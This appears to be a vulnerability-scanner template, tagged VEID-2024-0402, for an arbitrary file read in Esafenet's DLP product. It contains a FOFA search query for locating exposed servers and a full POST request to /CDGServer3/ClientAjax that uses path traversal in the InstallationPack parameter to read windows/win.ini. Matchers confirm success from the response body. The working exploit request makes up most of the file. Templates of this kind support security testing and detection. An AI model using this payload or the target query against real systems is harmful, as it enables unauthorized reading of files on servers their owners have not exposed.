## id: VEID-2024-0402
## name: 亿赛通-数据泄露防护(DLP)ClientAjax接口存在任意文件读取漏洞
## author: hack007x
## severity: high
## tags: veid,file,veid2024
## description: 亿赛通(DLP)存在任意文件读取漏洞
## fofa-query: body="CDGServer3" || title="电子文档安全管理系统" || cert="esafenet" || body="/help/getEditionInfo.jsp"||body="/CDGServer3/index.jsp"
## verification: true


POST /CDGServer3/ClientAjax HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: application/x-www-form-urlencoded

command=downclientpak&InstallationPack=../../../../../../../../../../windows/win.ini&forward=index.jsp


#@ condition: and
#@ matcher: body contains "[fonts]" && body contains "[extensions]"
#@ matcher: status_code == 200 || status_code == 500 || status_code == 400




# @VEIL-STAMP: dc467ff02f3605544c075015602508d3323eb89dc5a0b506f0810b3853787456
